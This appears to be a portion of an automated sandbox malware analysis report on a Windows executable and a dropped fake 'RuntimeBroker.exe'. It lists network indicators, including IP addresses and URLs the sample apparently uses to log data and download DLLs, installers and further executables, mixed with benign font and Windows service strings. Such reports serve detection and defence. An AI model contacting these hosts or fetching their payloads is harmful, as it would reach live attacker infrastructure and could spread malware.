DNS traffic detected: query: 201.75.14.0.in-addr.arpa replaycode: Name error (3)

Source: Joe Sandbox View	ASN Name: PINGTAN-AS-APKirinNetworksCN PINGTAN-AS-APKirinNetworksCN
Source: Joe Sandbox View	ASN Name: PINGTAN-AS-APKirinNetworksCN PINGTAN-AS-APKirinNetworksCN

Source: global traffic

TCP traffic: 192.168.2.4:49769 -> 113.212.88.126:88

Source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.491314449.0000000000F72000.00000002.00000001.01000000.0000000E.sdmp, RuntimeBroker.exe0.0.dr	String found in binary or memory: http://#/Vv/resource.json
Source: RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.212.88.126/Vv/Ip.json
Source: RuntimeBroker.exe, 0000002B.00000002.493637205.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.496188314.00000000036E8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493980642.0000000003303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.212.88.126:88/log
Source: RuntimeBroker.exe, 0000002B.00000002.493637205.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.496188314.00000000036E8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493980642.0000000003303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.212.88.126:888
Source: RuntimeBroker.exe, 0000002B.00000002.493637205.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.212.88.126:88x
Source: RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://113.212.88.126x
Source: ywvz5i8kT9.exe, 00000000.00000002.493728263.0000000003488000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493479806.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153
Source: ywvz5i8kT9.exe, 00000000.00000002.493670964.000000000346C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/PcapDotNet.Analysis_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/PcapDotNet.Base_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.494015900.000000000352F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/PcapDotNet.Core.Extensions_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/PcapDotNet.Core_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/PcapDotNet.Packets_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493826597.00000000034B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/Remove.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/RuntimeBrokerBin_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/RuntimeBroker_64.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/WinPcap_4_1_3.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.493670964.000000000346C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/install_wim_tweak.dll
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/vcredist_2010_x64.exe
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/1/vcredist_2013_x64.exe
Source: RuntimeBroker.exe, 0000002B.00000002.493479806.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153/Vv/Ip.json
Source: ywvz5i8kT9.exe, 00000000.00000002.494015900.000000000352F000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493826597.00000000034B6000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.1538
Source: ywvz5i8kT9.exe, 00000000.00000002.493768464.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.135.48.153x
Source: RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1212.me/Vv/RuntimeBrokerBin_32.exe
Source: RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1212.me/Vv/RuntimeBrokerBin_64.exe
Source: svchost.exe, 00000021.00000002.493981813.0000020AC4664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, WinPcapInstall.dll.30.dr, Packet.dll.30.dr, Packet.dll0.30.dr, wpcap.dll0.30.dr, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000021.00000002.493981813.0000020AC4664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ywvz5i8kT9.exe, 00000000.00000003.234699840.000000001C2AF000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.234622439.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.233464647.000000001C2A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: WinPcap_4_1_3.exe, 0000001E.00000000.313186532.0000000000409000.00000008.00000001.01000000.00000007.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.370589882.0000000000625000.00000004.00000020.00020000.00000000.sdmp, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: WinPcap_4_1_3.exe, 0000001E.00000000.313186532.0000000000409000.00000008.00000001.01000000.00000007.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.370589882.0000000000625000.00000004.00000020.00020000.00000000.sdmp, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, WinPcapInstall.dll.30.dr, Packet.dll.30.dr, Packet.dll0.30.dr, wpcap.dll0.30.dr, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: PcapDotNet.Analysis.dll.0.dr	String found in binary or memory: http://schemas.preemptive.com/services/messaging
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Analysis.dll.0.dr	String found in binary or memory: http://schemas.preemptive.com/services/messaging/Publish
Source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Analysis.dll.0.dr	String found in binary or memory: http://schemas.preemptive.com/services/messagingT
Source: ywvz5i8kT9.exe, 00000000.00000002.493499241.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493479806.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, WinPcapInstall.dll.30.dr, Packet.dll.30.dr, Packet.dll0.30.dr, wpcap.dll0.30.dr, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, WinPcapInstall.dll.30.dr, Packet.dll.30.dr, Packet.dll0.30.dr, wpcap.dll0.30.dr, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, WinPcapInstall.dll.30.dr, Packet.dll.30.dr, Packet.dll0.30.dr, wpcap.dll0.30.dr, WinPcap_4_1_3.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: vcredist_2013_x64.exe, 00000023.00000003.351059040.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, thm.xml.35.dr	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: vcredist_2013_x64.exe, 00000023.00000003.350949207.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/20100.30501.0
Source: vcredist_2013_x64.exe, 00000023.00000003.350949207.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010ft
Source: vcredist_2013_x64.exe, 00000023.00000003.350949207.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010mas.m
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.238127910.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: svchost.exe, 00000019.00000002.312526329.000002196F813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.comsv
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ywvz5i8kT9.exe, 00000000.00000003.245165196.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.250257094.000000001C2BB000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242324664.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242402246.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.245217351.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ywvz5i8kT9.exe, 00000000.00000003.250163855.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.250450243.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242948918.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.243267669.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ywvz5i8kT9.exe, 00000000.00000003.241692772.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ywvz5i8kT9.exe, 00000000.00000003.245127944.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers0.
Source: ywvz5i8kT9.exe, 00000000.00000003.250163855.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers2
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ywvz5i8kT9.exe, 00000000.00000003.244415198.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244514029.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244629442.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersK
Source: ywvz5i8kT9.exe, 00000000.00000003.242765497.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242615058.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.243173510.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242703586.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242282550.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242515498.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242431869.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242352869.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.243036393.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242833068.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242948918.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersPI
Source: ywvz5i8kT9.exe, 00000000.00000003.242515498.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242431869.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersers
Source: ywvz5i8kT9.exe, 00000000.00000003.244415198.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244877834.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244699190.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244949239.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244514029.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244629442.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244791932.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244350188.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.245048888.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designerspD
Source: ywvz5i8kT9.exe, 00000000.00000003.242402246.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: ywvz5i8kT9.exe, 00000000.00000003.250257094.000000001C2BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comiven-us
Source: ywvz5i8kT9.exe, 00000000.00000003.242324664.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242402246.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comva
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ywvz5i8kT9.exe, 00000000.00000003.236490651.000000001C2B8000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.236742153.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ywvz5i8kT9.exe, 00000000.00000003.236080809.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ywvz5i8kT9.exe, 00000000.00000003.236588666.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnm
Source: ywvz5i8kT9.exe, 00000000.00000003.236490651.000000001C2B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnom
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ywvz5i8kT9.exe, 00000000.00000003.239627688.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239627688.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.TTC
Source: ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239627688.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/Fa
Source: ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/(
Source: ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ywvz5i8kT9.exe, 00000000.00000003.234159980.000000001C2BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comrw
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ywvz5i8kT9.exe, 00000000.00000003.239917168.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comx
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ywvz5i8kT9.exe, 00000000.00000003.235768974.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr(
Source: ywvz5i8kT9.exe, 00000000.00000003.235995216.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krF
Source: ywvz5i8kT9.exe, 00000000.00000003.235995216.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.235768974.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krim
Source: ywvz5i8kT9.exe, 00000000.00000003.235768974.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krnta
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ywvz5i8kT9.exe, 00000000.00000003.245331863.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deE
Source: WinPcap_4_1_3.exe, 0000001E.00000003.339377384.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.341353098.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.373685408.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.343032242.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.385069045.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.340422993.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.386301100.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.345548450.0000000002B80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.winpcap.org
Source: WinPcap Web Site.url.30.dr	String found in binary or memory: http://www.winpcap.org/
Source: ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 00000017.00000002.492172371.00000153B0A44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000017.00000002.492172371.00000153B0A44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000017.00000002.492172371.00000153B0A44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000017.00000002.492088714.00000153B0A29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000017.00000002.492088714.00000153B0A29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000019.00000003.312116820.000002196F868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312611399.000002196F86A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000019.00000003.312123607.000002196F850000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312591094.000002196F856000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312249223.000002196F855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
